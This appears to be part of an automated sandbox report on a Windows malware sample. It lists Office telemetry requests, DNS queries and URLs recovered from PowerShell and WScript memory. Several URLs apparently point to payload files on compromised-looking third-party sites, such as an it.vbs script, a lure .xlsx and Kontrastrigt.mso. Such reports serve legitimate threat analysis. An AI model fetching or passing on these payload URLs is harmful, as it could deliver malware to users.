            Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
            Source: global trafficDNS traffic detected: DNS query: www.puneet.ae
            Source: global trafficDNS traffic detected: DNS query: www.fornid.com
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE1A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
            Source: svchost.exe, 0000000F.00000002.2759372150.0000020DAEA0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: wscript.exe, 00000004.00000003.1531458344.000001989DB5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1531354913.000001989DB59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/K
            Source: wscript.exe, 00000004.00000003.1554472467.000001989BB38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.1562018894.000001989BB38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1547339380.000001989BB38000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000004.00000003.1547339380.000001989BAFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.1561944598.000001989BB0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
            Source: wscript.exe, 00000004.00000003.1532148100.000001989DB3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1531394988.000001989DB3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1531923433.000001989DB3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabz
            Source: wscript.exe, 00000004.00000003.1547339380.000001989BAFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.1561944598.000001989BB0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
            Source: wscript.exe, 00000004.00000003.1531865535.000001989BB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.1532097657.000001989BB86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?768a17d74b
            Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.15.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE1DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
            Source: powershell.exe, 00000002.00000002.2836854047.000002DDF05F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2836854047.000002DDF04B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2756383968.000002DDE1E7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://puneet.ae
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE0441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E16B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2754994863.0000000004291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE1A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE1DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E349B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.puneet.ae
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE0441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E16B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000A.00000002.2754994863.0000000004291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
            Source: svchost.exe, 0000000F.00000003.1801713991.0000020DAE890000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.15.dr, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE106C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E2BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2836854047.000002DDF05F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2836854047.000002DDF04B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2756383968.000002DDE1E7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE106C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
            Source: powershell.exe, 00000002.00000002.2845673774.000002DDF8540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/it/it.vbs
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE1DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
            Source: powershell.exe, 00000002.00000002.2756383968.000002DDE1DD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ab/List
            Source: powershell.exe, 00000002.00000002.2845673774.000002DDF8540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ab/List%20of%20required%20items.xlsx
            Source: powershell.exe, 0000000A.00000002.2754994863.00000000043E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/it/Kontrastrigt.mso
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E2BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/it/Kontrastrigt.mso0
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E33E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae
            Source: powershell.exe, 00000007.00000002.1667958420.00000263E2BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2754994863.00000000043E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/it/Kontrastrigt.mso
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
